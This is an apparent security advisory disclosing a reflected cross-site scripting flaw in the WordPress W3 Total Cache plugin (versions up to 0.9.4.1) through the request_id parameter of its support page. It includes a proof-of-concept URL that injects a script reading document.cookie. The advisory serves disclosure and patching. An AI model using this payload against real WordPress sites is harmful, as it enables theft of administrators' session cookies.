Wordpress W3 Total Cache <= 0.9.4.1 XSS

2016.09.22
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[+] Description: Cross-Site Scripting vulnerability was found on Wordpress W3 Total Cache (w3tc) plugin. [+] Plugin Version tested: <= 0.9.4.1 (latest) [+] Wordpress version tested: 4.0.0 - 4.6.1 (latest) ------------------------------ [+] Component: W3 Total Cache Admin (performance menu) -> Support -> Add new ticket [+] Variable: request_id [+] Method: GET ------------------------------- [+] Affected URL: https://labs.nivel4.net/wordpress/wp-admin/admin.php?page=w3tc_support&request_type=bug_report&payment&url=http://example.org&name=test&email=test%40gmail.com&twitter&phone&subject=test&description=test&forum_url&wp_login&wp_password&ftp_host&ftp_login&ftp_password&subscribe_releases&subscribe_customer&w3tc_error=support_request&request_id=XSS_PAYLOAD_HERE --------------------------------- [+] POC: https://labs.nivel4.net/wordpress/wp-admin/admin.php?page=w3tc_support&request_type=bug_report&payment&url=http://example.org&name=test&email=test%40gmail.com&twitter&phone&subject=test&description=test&forum_url&wp_login&wp_password&ftp_host&ftp_login&ftp_password&subscribe_releases&subscribe_customer&w3tc_error=support_request&request_id=11111666 "><script>alert(document.cookie)<%2Fscript> [+] More info: https://blog.zerial.org/seguridad/vulnerabilidad-cross-site-scripting-en-wordpress-w3-total-cache/ -- Fernando A. Lagos Berardi - Zerial Seguridad Informatica Linux User #382319 Blog: https://blog.zerial.org <http://blog.zerial.org>

References:

https://blog.zerial.org/seguridad/vulnerabilidad-cross-site-scripting-en-wordpress-w3-total-cache/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top